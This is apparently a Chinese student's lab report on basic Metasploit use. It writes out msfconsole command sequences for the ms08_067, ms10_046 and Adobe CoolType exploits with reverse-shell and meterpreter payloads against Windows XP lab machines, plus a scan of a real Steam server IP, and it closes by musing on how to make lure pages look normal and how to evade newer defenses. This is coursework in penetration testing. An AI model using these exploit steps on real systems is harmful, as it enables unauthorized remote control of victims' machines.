20155223 实验5 MSF基础应用

20155223 实验5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode？

exploit：漏洞攻击。一个exploit程序肯定会触发系统的一个或多个漏洞，进而程序直接获取到目标系统的部分或所有权限。一个漏洞攻击程序可以在本地运行也可以远程运行，远程运行的漏洞攻击可以理论上获取被攻击系统的所有控制权。

payload：有效载荷，可以理解为搞破坏的关键代码。电脑病毒中可以直接完成预定目标的代码段便是其“有效载荷”。

encode：编码。通过一些特殊手段的编码，可以既保证有效载荷不被破坏，又使得漏洞攻击程序不会被侦察到。

实践内容

主动攻击：ms08_067漏洞攻击

攻击方：Kali Linux x64

靶机：Windows XP SP3(English)

关闭XP的所有防御，包括防火墙和杀毒软件。

在Kali机启动msfconsole，按照指导步骤输入以下代码：

use exploit/windows/smb/ms08_067_netapi   // 使用ms08_067漏洞攻击方式
set payload generic/shell_reverse_tcp       // 以shell反向tcp连接为有效载荷
set RHOST 192.168.129.134     // 受害者的IP
set LHOST 192.168.129.133     // 施害者的IP
set target 0      // 设置目标，0为无差别攻击

输入exploit开始发动攻击：

好了，我已经获取到受害者的控制权了。

对浏览器攻击：ms10_046漏洞攻击

受害者：Windows XP SP3(zh_cn)

攻击者：Kali Linux

在Kali攻击机开启msfconsole，输入以下命令：

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader // 使用浏览器漏洞
set payload windows/meterpreter/reverse_tcp // 选择反向链接载荷

看看这东西需要设置什么：

set SRVHOST 192.168.129.133 // 设置服务器主机IP
set LHOST 192.168.129.133 // 设置攻击机IP

之后输入exploit会出现一段URI：http://192.168.129.133:80/，同时控制台进入监听状态。

受害者访问这个神奇的URI，会弹出一个这样的窗口：

这是光明正大地告诉受害者他被攻击了吗？

同时，一直在监听的控制台同受害者建立起一个连接：

输入sessions查看有多少机器被反向链接到Kali机上（只有一个）。

再次输入sessions -i 1以控制受害者。

对Adobe的漏洞攻击

选择使用他人的成熟方案来攻击Adobe。

输入exploit/windows/fileformat/adobe_cooltype_sing确定攻击方案。

仍然是使用反向链接来做负载。

设置很简单，只需要确定攻击机的IP地址就可以了，端口写死是4444端口。

把生成的文件发送到受害者，并诱使其打开这个来路不明的pdf文件。

打开就卡死，不知道算不算是溢出之类的错误。

同时，在Kali的msfconsole上输入以下命令开始监听：

use exploit/multi/handler
set LHOST 192.168.129.133
set LPORT 4444
exploit

得到结果：

辅助模块的应用

msfconsole命令：show auxiliary去查看全部辅助模块。

浏览中发现一个扫描模块：scanner/steam/server_info.作用初步确定是收集steam服务器信息的。

G胖：嗯，是时候开始新一轮夏季降价了。>:)

use scanner/steam/server_info，show options 这扫描模块只用设置扫描起点IP即可，扫描范围默认为10（从起始地址开始往后扫10个）。端口固定为UDP端口27015，端口27015只是用作输入/输出的通信端口，一般会有QQ、微信、steam使用该端口。

设置起点为192.168.129.135。如果在这个范围内真的有steam的服务器，我就想知道是哪个人会在这么长的地方设置服务器。



然后是没有，意料之中。

好的，我必须知道哪些IP地址是指向Steam服务器。

《反恐精英：全球攻势》是一款Steam平台上的游戏，如果我要玩这游戏，那么我发送请求的数据包的目的地址一定是一个Steam服务器。所以我要证明这个辅助模块还能用，就必须抓到那个发给Steam服务器的数据包。

不过，我可以选择另一条简单的道路：在游戏里打开控制台，控制台可以在我进入游戏的过程中显示我将要联系上的服务器IP。



我获得到这个IP，怎么感觉这个IP不是中国的。

再次使用scanner/steam/server_info，设置目的IP为所得IP。得到这个：

切！这个只能显示服务器支持哪款游戏，并不能显示这个服务器是以什么系统建立的，也不能显示服务器是不是公共服务器。

实验总结与体会

这个MSF平台还有很多功能我们没有发现，但是其局限性已经暴露无遗。浏览器渗透攻击只针对IE8.0以下版本，根本就不能搞定其他的浏览器；系统只针对经典版本Windows XP，任何高于winXP的操作系统，其自带的防火墙就可以拦阻来自msf制造的攻击；倒是扫描模块不错，有不少特别好用的。但是考虑到正在做实验的IPv6，msf的扫描却只有一个可用的。

离实战还缺些什么技术或步骤？

• 怎么样才能做到主动出击，而不是制造陷阱让人往里跳？
• 怎么样让浏览器攻击的诱饵页面更像一个正常的页面？
• 还没有能够躲开Win10版本的扫描技术。